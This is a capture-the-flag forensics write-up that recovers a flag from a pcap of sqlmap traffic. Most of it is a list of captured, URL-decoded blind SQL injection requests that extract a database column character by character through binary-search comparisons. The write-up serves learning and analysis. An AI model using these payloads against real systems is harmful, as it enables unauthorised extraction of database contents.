SQLMAP - 125 Points

sqlmap.pcap

POC

From the pcap file we run strings | grep SELECT. We then copy all of the output into an online URL decoder so it is easier to read, and after that we discard the parts that are not needed, such as the requests that enumerate database/column names, look up character lengths, and so on, keeping only the requests made while the flag was being dumped (dataclean).

Table: flag, Column: flag, Database: loki

GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>68 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>70 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),1,1))>71 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>68 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>70 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),2,1))>69 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>76 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>78 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),3,1))>77 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>68 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>66 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),4,1))>65 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>84 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>82 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),5,1))>83 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>84 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>82 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),6,1))>83 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>76 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>74 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),7,1))>73 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>72 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>76 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>74 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),8,1))>75 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>124 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>122 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),9,1))>123 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>106 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),10,1))>107 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),11,1))>109 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),12,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>116 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>118 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),13,1))>119 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>92 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>94 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),14,1))>95 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>120 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>116 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>114 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),15,1))>115 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>100 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>102 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),16,1))>103 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>100 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>102 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),17,1))>101 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>80 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>88 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>92 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>94 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),18,1))>95 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>100 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>98 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),19,1))>99 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),20,1))>111 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>64 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>96 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>112 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>104 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>108 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>110 AND '%'='HTTP/1.1
GET/laboratory/index.php?s=test%' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM loki.flag ORDER BY flag LIMIT 0,1),21,1))>109 AND '%'='HTTP/1.1
